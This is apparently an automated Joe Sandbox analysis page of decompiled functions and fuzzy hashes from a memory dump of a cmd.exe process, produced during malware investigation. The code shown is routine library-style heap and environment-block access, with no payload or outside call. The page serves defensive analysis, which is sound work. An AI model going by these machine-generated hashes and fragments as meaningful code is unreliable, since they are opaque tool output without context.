Instruction Fuzzy Hash: C9D0C939352980CFD616CB0CC554B0573A8BB04B80FC905D0E400CB761E63CD940CA00

Uniqueness

Uniqueness Score: -1.00%

Function 036F35A1 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036F35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E036DEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x036f35a1
0x036f35a1
0x036f35a5
0x036f35ab
0x036f35ab
0x036f35b5
0x00000000
0x036f35c1
0x036f35b7

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: d7fe444239df80424e9c1e53b690aa1de7513184fb5626ec018f6e590f37d882
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 53D0C93D9522849EDF53EB50C31877CB7B6BB80318F7C20A996460EB62C33A4A5AD605

Uniqueness

Uniqueness Score: -1.00%

Function 036CDB40 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036CDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L036E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x036cdb4d
0x036cdb54
0x036cdb5f
0x036cdb56
0x036cdb56
0x036cdb5c
0x036cdb5c

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 6c15674a925b21f05fcb77fe58f506a293bfb4231eecac03745d23c6c0b7cd2a
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 37C08C70291B40AAEB229F20CE01B1077A0BB00B01F4800A46300DA0F0EF78D811E604

Uniqueness

Uniqueness Score: -1.00%

Function 0374A537 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0374A537(intOrPtr _a4, intOrPtr _a8) {

				return L036E8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0374a553

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: cf95ec12dec55909a7260729d87fadbf34f70267b6da6a920af4e288fafa5704
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 47C08C37080248BBCB12AF81CC00F167F2AFB94B60F008014FA080F570C632E974EB88

Uniqueness

Uniqueness Score: -1.00%

Function 036E3A1C Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036E3A1C(intOrPtr _a4) {
				void* _t5;

				return L036E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x036e3a35

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: f6de217e4031beb95b0eb7389b981d0dcf35eabf3795a3463f5a67eb14f45502
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 49C08C32080248BBCB12AE42DC00F017B29E790B60F000020B6040B5608932EC60D58C

Uniqueness

Uniqueness Score: -1.00%

Function 036D76E2 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036D76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x036d76e4
0x00000000
0x036d76f8
0x036d76fd

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 9caf46886abe91cc01c65c76e2df8b852d6868d29aba65ff826c850a16719f21
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: F4C08C745422C05AEF2ADB08CF24B20B654AB08608F5C019CAA010D6A1D368A822C208

Uniqueness

Uniqueness Score: -1.00%

Function 036F36CC Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036F36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x036f36d2
0x036f36e8
0x036f36d4
0x036f36e5
0x036f36e5

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 98e571cea350fe81c92680250684fb7beb4a3744817f27210ecc0b8e6fb3f29c
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 67C09B79155540BFDB169F30CE51F157354F740A61F7C075873214A6F0DD699C54D50C

Uniqueness

Uniqueness Score: -1.00%

Function 036CAD30 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036CAD30(intOrPtr _a4) {

				return L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x036cad49

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 7acc525eb536de6aa8923e3b37268e862e6142e62fe298d7e8d727421fcd8378
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 97C08C32080248BBCB12AA45DD00F017B29E790B60F100020F6040A6618932E860E588

Uniqueness

Uniqueness Score: -1.00%

Function 036E7D50 Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036E7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x036e7d56
0x036e7d5b
0x036e7d60
0x036e7d5d
0x036e7d5d
0x036e7d5d

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: c496b7b424d20d54016b37cf8a245fc8b870bce0b4f38e5a80690b3a267d2fa5
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 7DB09234302941CFCE16DF18C180B1533E8FB44A40B8800D0E400CBA20D229E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 036F2ACB Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036F2ACB() {
				void* _t5;

				return E036DEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x036f2adc

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: a87c9b7788c5eb30d2444c559bedc59bc75fa01b374ccced4b26ae22a4f47f46
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 61B01232C11640CFCF02FF40C710B197331FB00750F05449490012F930C229BC01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 03709B00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d14afc3f7448137c2a3aa32686046357e9ddd0639bd75ee02d9ac8a9a682656
Instruction ID: c2d473a9ba9cf7c9660e52e202c6dc572b2d18ca2489fa64f9df60ce8407c7d1
Opcode Fuzzy Hash: 5d14afc3f7448137c2a3aa32686046357e9ddd0639bd75ee02d9ac8a9a682656
Instruction Fuzzy Hash: B290026224105C06E250B55D84147170446D7D4641F51C421A0015554D875689757AF1

Uniqueness

Uniqueness Score: -1.00%

Function 03709A10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 273d1255012e3b44c5930e1e4e38d0e75cad10db8fd6afc5becb5497692575c6
Instruction ID: 19a96fc597742d34b79c27fd85d6f916e9d86c5853063f9bce65b3245495f338
Opcode Fuzzy Hash: 273d1255012e3b44c5930e1e4e38d0e75cad10db8fd6afc5becb5497692575c6
Instruction Fuzzy Hash: A690027220145806E210A55D4808757044597D4342F51C421A5155555E87A5C8A17971

Uniqueness

Uniqueness Score: -1.00%

Function 03709A00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f5a4dc88dbd053647cf98ec834a155566b2d968b18f4014a6745c7e2617be32
Instruction ID: c53588357f499b1ec3eccde863eaf73deea6c50c104f9f5eff626bfa9208457e
Opcode Fuzzy Hash: 0f5a4dc88dbd053647cf98ec834a155566b2d968b18f4014a6745c7e2617be32
Instruction Fuzzy Hash: 7490027220145806E210A55D481471B044597D4342F51C421A1155555D8765886179B1

Uniqueness

Uniqueness Score: -1.00%

Function 03709A80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4441ba96bda57d0ce925c8270429ac7ba1f322d039b7fdc25b580576b97cd74e
Instruction ID: ff8dce5cc4179c72a05e1dd2f2e02287eb35d94cd24194c998610d1a36a7f392
Opcode Fuzzy Hash: 4441ba96bda57d0ce925c8270429ac7ba1f322d039b7fdc25b580576b97cd74e
Instruction Fuzzy Hash: 5590026220149846E250A65D4804B1F454597E5242F91C429A4147554CCA5588657B61

Uniqueness

Uniqueness Score: -1.00%

Function 037099D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20601f8501d9ea97254cfa41003e70d49dbd26b065aa1b2bccb3e3deb2e1f0c3
Instruction ID: dbfc4cf5fa589774c0f7074fa717e63cb6ace0f5eab33b7e6dbc064ac57b11f7
Opcode Fuzzy Hash: 20601f8501d9ea97254cfa41003e70d49dbd26b065aa1b2bccb3e3deb2e1f0c3
Instruction Fuzzy Hash: D39002A221105446E214A55D4404716048597E5241F51C422A2145554CC6698C717565

Uniqueness

Uniqueness Score: -1.00%

Function 03709820 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7083d42ddadfbc7f352c04cb6e4e61c178dca3e3a5c4c0c843d5f9988daf8930
Instruction ID: 3521da435bd56696479c6de8ac302d7d3e960fd12eea7c59e2f37cc59966c688
Opcode Fuzzy Hash: 7083d42ddadfbc7f352c04cb6e4e61c178dca3e3a5c4c0c843d5f9988daf8930
Instruction Fuzzy Hash: 9890027224105806E251B55D44046160449A7D4281F91C422A0415554E87958A66BEA1

Uniqueness

Uniqueness Score: -1.00%

Function 037098F0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e51316c0931681fbfa360c8149de87c9010f9266244a62a77765b5539a43151d
Instruction ID: 21fe1b76282b1537beff0f5828d9f3a9b2746f8b3bec41a70f4a96a47bedad06
Opcode Fuzzy Hash: e51316c0931681fbfa360c8149de87c9010f9266244a62a77765b5539a43151d
Instruction Fuzzy Hash: 2390026260105906E211B55D4404626044A97D4281F91C432A1015555ECB6589A2B571

Uniqueness

Uniqueness Score: -1.00%

Function 037098A0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 195e6bea0379cd56fc8aa14f525e85b0c5eb2ce105df949c0c1e41a0586cb13e
Instruction ID: 96c51dc87b3a50cf4322f75c27edb1fec52052cd6078d75a7a2390869ee8a731
Opcode Fuzzy Hash: 195e6bea0379cd56fc8aa14f525e85b0c5eb2ce105df949c0c1e41a0586cb13e
Instruction Fuzzy Hash: 2690026230105806E212A55D44146160449D7D5385F91C422E1415555D87658963B572

Uniqueness

Uniqueness Score: -1.00%

Function 0370A770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 196a8318d9578201eea7531e027e43fddc5041ab6e57839b58c509b7c14b601f
Instruction ID: c7f2edc6d5021c61ef802477553235f76b83d736f24524813032cf8739257bb3
Opcode Fuzzy Hash: 196a8318d9578201eea7531e027e43fddc5041ab6e57839b58c509b7c14b601f
Instruction Fuzzy Hash: 7C90027620509846E610A95D5804A97044597D4345F51D821A041559CD87948871B561

Uniqueness

Uniqueness Score: -1.00%

Function 03709770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1077868a275235452dc3f4b39dafd2f4f324bf4cf3328cfc484240f286eeb183
Instruction ID: 35a4f3c28c2d25f9205743e2e85da047b7ef9f7ddd9569934f9ad573e3801c8f
Opcode Fuzzy Hash: 1077868a275235452dc3f4b39dafd2f4f324bf4cf3328cfc484240f286eeb183
Instruction Fuzzy Hash: 9D90026220509846E210A95D5408A16044597D4245F51D421A1055595DC7758861B571

Uniqueness

Uniqueness Score: -1.00%

Function 03709760 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfb69ea731e3d756a0833cc4298c92b66494356291edaa55c490da5c1f843f52
Instruction ID: f8ce1359dd6737f9d9702ddc9637985fa1a1fb5a25d5a80275117a5c69a6e9f1
Opcode Fuzzy Hash: bfb69ea731e3d756a0833cc4298c92b66494356291edaa55c490da5c1f843f52
Instruction Fuzzy Hash: 0990027220105807E210A55D5508717044597D4241F51D821A0415558DD79688617561

Uniqueness

Uniqueness Score: -1.00%

Function 03709730 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a335df87910fe568d46f38c8702db02022c25e59687422aa383f7ca6063ab2c3
Instruction ID: 418fe966a215d6753e9eea3c6612c0ceb88168119a7ec6072ee10b2a63395d2e
Opcode Fuzzy Hash: a335df87910fe568d46f38c8702db02022c25e59687422aa383f7ca6063ab2c3
Instruction Fuzzy Hash: 3F90026260505806E250B55D5418716045597D4241F51D421A0015554DC7998A657AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0370A710 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38df2a552d79640c86147fa853fdf2da1dd290542ea0f8ae3860193c61d5e8f2
Instruction ID: b646051515b593107173b7104183935b789b35799356a3a721f33d5816bc99d4
Opcode Fuzzy Hash: 38df2a552d79640c86147fa853fdf2da1dd290542ea0f8ae3860193c61d5e8f2
Instruction Fuzzy Hash: 0D90027230105456A610EA9D5804A5A454597F4341B51D425A4005554C869488717561

Uniqueness

Uniqueness Score: -1.00%

Function 03709660 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4372e648335cccc80817ba9a3045203c1bff2b3f289746cadbeacb78abebae62
Instruction ID: a5947fc1e8cac054869cd77bab7ca3a734978115d9b1a6322c2b6c26efc5e375
Opcode Fuzzy Hash: 4372e648335cccc80817ba9a3045203c1bff2b3f289746cadbeacb78abebae62
Instruction Fuzzy Hash: 1A90027220105C06E290B55D440465A044597D5341F91C425A0016654DCB558A697BE1

Uniqueness

Uniqueness Score: -1.00%

Function 03709650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66ee6b82562f3ce74da1918f5ea33aaf1e7101397891085d1cc623b2a11d5649
Instruction ID: 11da90b26518614a68041584f4b8c79651f3cc49da08260f541f00e23ed551ee
Opcode Fuzzy Hash: 66ee6b82562f3ce74da1918f5ea33aaf1e7101397891085d1cc623b2a11d5649
Instruction Fuzzy Hash: 7890027220509C46E250B55D4404A56045597D4345F51C421A0055694D97658D65BAA1

Uniqueness

Uniqueness Score: -1.00%

Function 03709610 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac4c1088aa3d5e8bc586e32962eaefdcfb4c5f20c894263992a529c2303e1edf
Instruction ID: 50ea9807ef6951d09880faa4d6c5a63a9547cc6af440ecf2a5f5afdb305307b1
Opcode Fuzzy Hash: ac4c1088aa3d5e8bc586e32962eaefdcfb4c5f20c894263992a529c2303e1edf
Instruction Fuzzy Hash: ED90027260505C06E260B55D4414756044597D4341F51C421A0015654D87958A657AE1

Uniqueness

Uniqueness Score: -1.00%

Function 037096D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0796b17a002361932155bd75e05f82aab801aa5440741506c64035ff6ce8596d
Instruction ID: eab17eb215267baafb5931a8ef6805b0115d5cc20d45ef37e9154dd95c4b75f7
Opcode Fuzzy Hash: 0796b17a002361932155bd75e05f82aab801aa5440741506c64035ff6ce8596d
Instruction Fuzzy Hash: 6190027220105C46E210A55D4404B56044597E4341F51C426A0115654D8755C8617961

Uniqueness

Uniqueness Score: -1.00%

Function 03709560 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

